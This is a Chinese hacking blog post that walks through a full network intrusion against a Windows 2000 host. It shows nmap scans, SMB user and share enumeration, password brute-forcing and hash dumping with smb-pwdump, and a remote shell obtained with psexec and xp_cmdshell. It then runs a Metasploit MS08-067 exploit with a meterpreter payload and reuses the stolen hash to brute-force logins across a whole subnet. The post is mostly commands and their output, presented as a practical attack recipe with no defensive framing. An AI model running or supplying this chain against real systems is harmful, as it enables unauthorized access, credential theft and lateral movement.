注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

nmap msf渗透 不要以为nmap只是用来扫描的  

2012-11-02 01:53:18|  分类: 渗透测试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

K8搞基大队 Q群 欢迎大家点击加入
http://qqhack8.blog.163.com/blog/static/114147985201112115627960/

root@bt:~# nmap -sS -sV 192.168.1.108
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.00048s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE       VERSION
 
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
 
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
 
1026/tcp open  msrpc         Microsoft Windows RPC
 
3372/tcp open  msdtc?
 
3389/tcp open  ms-term-serv?
 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
 转自:http://qqhack8.blog.163.com
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
 
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
 
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
 
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
 
SF:ptions,6,"hO\n\x000Z");
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Service Info: OS: Windows
 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
 
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
 
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb
 
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
 
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
 
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
 
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
 
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
 
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
 
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
 
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
 
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
 
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
 
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
 
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
 
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
 
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
 
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
 
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 192.168.1.108    //使用这个脚本扫描远程机器所存在的账户名
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.00038s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE
 
135/tcp  open  msrpc
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds
 
1025/tcp open  NFS-or-IIS
 
1026/tcp open  LSA-or-nterm
 
3372/tcp open  msdtc
 
3389/tcp open  ms-term-serv
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 转自:http://qqhack8.blog.163.com
Host script results:
 
| smb-enum-users:
 
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
 
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
 
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 192.168.1.108  //查看共享
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.00035s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE
 
135/tcp  open  msrpc
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds
 
1025/tcp open  NFS-or-IIS
 
1026/tcp open  LSA-or-nterm
 
3372/tcp open  msdtc
 
3389/tcp open  ms-term-serv
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Host script results:
 
| smb-enum-shares:
 
|   ADMIN$
 
|     Anonymous access: <none>
 
|   C$
 
|     Anonymous access: <none>
 
|   IPC$
 
|_    Anonymous access: READ
 
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
 
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 192.168.1.108        //获取用户密码
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.00041s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE
 
135/tcp  open  msrpc
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds
 
1025/tcp open  NFS-or-IIS
 
1026/tcp open  LSA-or-nterm
 
3372/tcp open  msdtc
 
3389/tcp open  ms-term-serv
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Host script results:
 
| smb-brute:
 
|   administrator:<blank> => Login was successful
 
|_  test:123456 => Login was successful
 
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
 
root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2//抓hash
 
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
 
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
 
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 192.168.1.108 -p 135,445,139
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.0012s latency).
 
PORT    STATE SERVICE
 
135/tcp open  msrpc
 
139/tcp open  netbios-ssn
 
445/tcp open  microsoft-ds
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Host script results:
 
| smb-pwdump:
 
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
 
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
 
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
 
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
 
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
 
C:\Documents and Settings\Administrator\桌面>psexec.exe \\192.168.1.108  -u test             //获取一个cmdshell
 
 -p 123456 -e cmd.exe
 
PsExec v1.55 - Execute processes remotely
 
Copyright (C) 2001-2004 Mark Russinovich
 
Sysinternals - www.sysinternals.com
 
Microsoft Windows 2000 [Version 5.00.2195]
 
(C) 版权所有 1985-2000 Microsoft Corp.
 
C:\WINNT\system32>ipconfig
 
Windows 2000 IP Configuration
 
Ethernet adapter 本地连接:
 
        Connection-specific DNS Suffix  . :
 
        IP Address. . . . . . . . . . . . : 192.168.1.108
 
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
        Default Gateway . . . . . . . . . : 192.168.1.1
 
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 192.168.1.108 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   //远程登录sa执行命令
 
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 192.168.1.108     //检测目标机器漏洞
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
 
Nmap scan report for bogon (192.168.1.108)
 
Host is up (0.00046s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE
 
135/tcp  open  msrpc
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds
 
1025/tcp open  NFS-or-IIS
 
1026/tcp open  LSA-or-nterm
 
3372/tcp open  msdtc
 
3389/tcp open  ms-term-serv
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Host script results:
 
| smb-check-vulns:
 
|_  MS08-067: VULNERABLE
 
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
 
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
 
msf > search ms08
 
msf > use exploit/windows/smb/ms08_067_netapi
 
msf  exploit(ms08_067_netapi) > show options
 
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.108
 
msf  exploit(ms08_067_netapi) > show payloads
 
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
 
msf  exploit(ms08_067_netapi) > exploit
 
meterpreter >
 
Background session 2? [y/N]  (ctrl+z)
 
msf  exploit(ms08_067_netapi) > sessions -l
 
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
 
test
 
administrator
 
root@bt:/usr/local/share/nmap/scripts# vim password.txt
 
44EFCE164AB921CAAAD3B435B51404EE
 
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254  //利用用户名跟获取的hash尝试对整段进行登录
 
Nmap scan report for 192.168.1.105
 
Host is up (0.00088s latency).
 
Not shown: 993 closed ports
 
PORT     STATE SERVICE
 
135/tcp  open  msrpc
 
139/tcp  open  netbios-ssn
 
445/tcp  open  microsoft-ds
 
1025/tcp open  NFS-or-IIS
 
1026/tcp open  LSA-or-nterm
 
3372/tcp open  msdtc
 
3389/tcp open  ms-term-serv
 
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
 
Host script results:
 
| smb-brute:
 
|_  administrator:<blank> => Login was successful
  评论这张
 
阅读(5957)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016